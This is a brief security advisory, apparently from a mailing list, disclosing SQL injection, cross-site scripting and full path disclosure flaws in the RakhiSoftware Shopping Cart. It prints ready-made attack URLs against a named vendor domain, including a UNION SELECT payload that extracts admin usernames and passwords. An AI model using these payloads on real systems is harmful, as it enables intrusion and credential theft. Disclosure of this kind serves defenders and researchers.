Application: RakhiSoftware Shopping Cart Vendor Name: RakhiSoftware Vendors Url: http://willscript.com/ Bug Type: RakhiSoftware Shopping Cart (SQL,XSS,FPD) Multiple Vulnerabilities SQL category_id http://willscript.com/rjbike_new/product.php?category_id=1+union%20select%20 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21%20from%20admin--&subcategory_id=1 XSS category_id, subcategory_id http://willscript.com/rjbike_new/product.php?category_id=>'>&subcategory_id=1 http://willscript.com/rjbike_new/product.php?category_id=1&subcategory_id=>' > Full Path Disclosure on every page Set Cookie: PHPSESSID=' Credits: Charalambous Glafkos Email: glafkos (at) astalavista (dot) com ___________________________________________ ASTALAVISTA - the hacking & security community www.astalavista.com www.astalavista.net Best Regards, Charalambous Glafkos ( nowayout ) __________________________________________ ASTALAVISTA - the hacking & security community www.astalavista.com www.astalavista.net